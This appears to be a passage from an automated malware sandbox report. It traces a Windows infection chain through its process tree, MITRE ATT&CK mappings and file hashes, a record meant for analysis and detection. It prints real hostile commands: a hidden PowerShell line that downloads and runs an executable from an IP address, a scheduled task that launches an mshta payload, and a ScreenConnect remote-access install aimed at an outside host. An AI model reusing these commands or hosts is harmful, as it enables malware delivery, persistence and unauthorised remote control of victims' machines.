PID:4104 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn LLtZ5maYhpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn LLtZ5maYhpO /tr "mshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\bIpiiHxUp.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'V5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:892 -
C:\Users\Admin\AppData\Local\TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE"C:\Users\Admin\AppData\Local\TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6284
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089271001\bf14320d81.exe"C:\Users\Admin\AppData\Local\Temp\1089271001\bf14320d81.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6732 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5440
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089272001\2ee2d4784c.exe"C:\Users\Admin\AppData\Local\Temp\1089272001\2ee2d4784c.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7000 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:6892
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089273001\e8172d6c5e.exe"C:\Users\Admin\AppData\Local\Temp\1089273001\e8172d6c5e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\1089274001\c52951429a.exe"C:\Users\Admin\AppData\Local\Temp\1089274001\c52951429a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 15926⤵
- Program crash
PID:6288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6252 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5292 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"7⤵
- Executes dropped EXE
PID:6528 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6248
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6684 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 9608⤵
- Program crash
PID:6948
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 10448⤵
- Program crash
PID:6108
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"7⤵
- Executes dropped EXE
PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"8⤵
- Executes dropped EXE
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 10688⤵
- Program crash
PID:5040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089276001\02a5726205.exe"C:\Users\Admin\AppData\Local\Temp\1089276001\02a5726205.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"5⤵
- Executes dropped EXE
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7156 -
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"6⤵
- Executes dropped EXE
PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"6⤵
- Executes dropped EXE
PID:7160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 10526⤵
- Program crash
PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"5⤵
- Executes dropped EXE
PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6556 -
C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 10446⤵
- Program crash
PID:3292
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089282001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1089282001\a1EoH8b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6812 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:4516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"6⤵
- Executes dropped EXE
PID:6700
-
-
C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 9726⤵
- Program crash
PID:7064
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7464.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2p7464.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3l82Y.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3l82Y.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BD0C4CBDF6D08F02FDDF8C8EDEADB298 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI1B34.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240655234 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
PID:976
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4916
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 990B15982849AEBCBAB20EF1C00AC9EF2⤵
- Loads dropped DLL
PID:324
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B0BA77DCAE9D9040C5483C81C76C5673 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B46E9D6AE718BDB3A18C2361867BECCF C2⤵
- Loads dropped DLL
PID:4608 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIFC0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240783343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6148
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 20660FFCD1E873129401AF52DAD2DC9B2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3288
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=acf14c89-4870-4eb7-b512-1ca2e47936cd&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&c=prequest&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "dcb2c5b3-0734-4204-bbc8-608403f3c917" "User"2⤵
- Executes dropped EXE
PID:3156
-
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe" "RunRole" "78aab3bd-30a9-48a9-8a0c-e01af9f1609b" "System"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:2640
-
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6448
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6600 -ip 66001⤵PID:6380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7156 -ip 71561⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5592
-
C:\ProgramData\apisysDirectx_11\apisysDirectx.exeC:\ProgramData\apisysDirectx_11\apisysDirectx.exe1⤵
- Executes dropped EXE
PID:6772
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:1564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6684 -ip 66841⤵PID:6900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6556 -ip 65561⤵PID:1844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3724 -ip 37241⤵PID:348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1692 -ip 16921⤵PID:7084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1164 -ip 11641⤵PID:6556
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
3Authentication Package
1Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
7Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD5d0bbab5712186c475aa1a5a9cc891678
SHA1441badfdb7b27a6ea138a39cf84261fa1ee9be4b
SHA25665451b53abac1cb0b4ae6d35c4f61645c17f54e136c936263f64e06432d999f9
SHA512bcb4ea91ccc357bcb7e6fd4dba70ff2ecd181630f1e5b1bec7a90d9ae01181191300384d536c55d0966b3f5c902a0f6c0d62857c40f39536116594623d8988e7
-
Filesize
3KB
MD51170f4d9535ccbc34cb80c2c57211bb0
SHA1eb47ec4b24c18ccbf6da48d300fa87696b805ea3
SHA25677ec25b1f8416f4cece7d50901a97fff800576dba87222ba40f4e933f5173488
SHA51201eb326b7b9030f9a2a82922c5615244d8ffafddcb40cc5bfe34253c78211b7b3be126c115232f74d7dfc42ce4eef2acceb3449586efe2409d3e8d2f994997ba
-
Filesize
48KB
MD5d524e8e6fd04b097f0401b2b668db303
SHA19486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA25607d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5
-
Filesize
26KB
MD55cd580b22da0c33ec6730b10a6c74932
SHA10b6bded7936178d80841b289769c6ff0c8eead2d
SHA256de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787
-
Filesize
192KB
MD53724f06f3422f4e42b41e23acb39b152
SHA11220987627782d3c3397d4abf01ac3777999e01c
SHA256ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
SHA512509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42
-
Filesize
66KB
MD55db908c12d6e768081bced0e165e36f8
SHA1f2d3160f15cfd0989091249a61132a369e44dea4
SHA256fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA5128400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
-
Filesize
93KB
MD575b21d04c69128a7230a0998086b61aa
SHA1244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA5128d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll
Filesize254KB
MD55adcb5ae1a1690be69fd22bdf3c2db60
SHA109a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73
-
Filesize
588KB
MD51778204a8c3bc2b8e5e4194edbaf7135
SHA10203b65e92d2d1200dd695fe4c334955befbddd3
SHA256600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31
SHA512a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config
Filesize266B
MD5728175e20ffbceb46760bb5e1112f38b
SHA12421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA25687c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7
-
C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll
Filesize822KB
MD5be74ab7a848a2450a06de33d3026f59e
SHA121568dcb44df019f9faf049d6676a829323c601e
SHA2567a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA5122643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc
-
Filesize
1KB
MD5c0d2cd7ac50f669700a1c10033b3587f
SHA1ad9dcbcef8c13357ce23be47663b97e8dd713893
SHA256f4a2f6e0647e8c0dcb43982cc437ebe61c2350ca70c5fb6fc0d27d7381477b62
SHA5124fe71bd6929a78702cdcc4a942e1dd7970766831150313d0e145566496ed09c12e036dc492cb8a835bec87911d94394d9d3b677056e91837af4954870577ca1e
-
Filesize
944B
MD5dc4ecf929dfeed665ea45461ca624547
SHA182913405d7c1902e156c4e5d61dfb1b5fb54a2e0
SHA256482b0ed7d65d1776f42a0782dcc072d14f9846599544f5c79383c9c41658dd18
SHA512d21298e443f34866ac9878c23571e7577855a73581d430cccef333076ddac4fd9574dd16fa2e9a8a4e8e44c2c9ea4e89218dcd794cafc10afd45e7a6c41a1547
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json
Filesize24KB
MD5927ab662757e08340554d2eec1510691
SHA1a9f97dbd63780d8736045b30cb58df4445147d5d
SHA2567e55a3ae2117177b9d404ad53fd51589734268e9d620c98e6621036db4569ec3
SHA5121ef7490b41e9de6defb8612d1f866a81f2b6528ee0f410946cf5db63c0f03cab0d28ef54790ecf60dd0b7f8c11d5c583ff416ed3706028de391f179be088df07
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json.tmp
Filesize21KB
MD558cae7c9d1f1120a81270ea705148e77
SHA15984b39517afa3e5a2e389c833b69d26fdc0b1bd
SHA25669aef32d8469601789925b44f0dde30a58e388d120078371845e241b60d60ea6
SHA512f08bb62b17c438d1f4b22f2d6336d4703c2c80b05e191bffdee9b11b9603d29901c7a64cba383d336fa57193eb11aa48c097f113826bd6ea3941f5ecbbd732c8
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89
Filesize13KB
MD58a14e7c0a7cf80dba9bbe9c432bd28f1
SHA1e1f685191ec8b853eac371d6f6ee4a13a69f151f
SHA25604f47f4154f665f9302421eb5724c6f8c2459ff37c687e4afe2a7c54a51a3420
SHA51214b164fdccbc46d7f5b71bb83ed4b873f9bfb8e879071f7fc0b2eb7b92361b34fb8dad0f56d6d4561fa7ae639f290a44b16c11ca9b16d256480ee28a93cc069b
-
Filesize
1.7MB
MD518a4b6e3cfbe186a2903c364e0a61aed
SHA1da9cae2e678dae5190826cbb326ae3351c706f31
SHA2563ba522df8d9f2006d668e3ffc9d4fbb1ec6ac54a4a892926a4c3c61bfd3b76a8
SHA51231aa6b4ac5f175b538aa2b53fc7f955941d88b1c272582e68fc712f7ac652f02c5f2eb92539d8fe39c143235e1694d5f6b330f3785d2716f3d8d7bc4cfe2e181
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
350KB
MD5a8ead31687926172939f6c1f40b6cc31
SHA12f91f75dbdef8820146ceb6470634ab1ffb7b156
SHA25684aad76d2d1ac2179ea160565a28fc850ee125ff74c3aeb1754d20d8c9ed870c
SHA512a0082f833c6858208f04a62b03088873baac303203f758e458a1a067572ffe9785edb30dd075acbfc1431272f56a1b1be168ef29f6db0a7ee55578dc712fa387
-
Filesize
348KB
MD5ce869420036665a228c86599361f0423
SHA18732dfe486f5a7daa4aedda48a3eb134bc2f35c0
SHA256eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd
SHA51266f47f62ce2c0b49c6effcd152e49360b5fa4667f0db74bff7ff723f6e4bfc4df305ae249fad06feeaad57df14ee9919b7dcc04f7a55bb4b07e96406ed14319e
-
Filesize
2.1MB
MD55a599ff4879c953ae39141594df88901
SHA1afe5b05580871fab6be49c85ec54565798a14ad5
SHA25658c438da9075b2ef1492af7b651c510cb0976be7b3889404b1b77cc52836cfdd
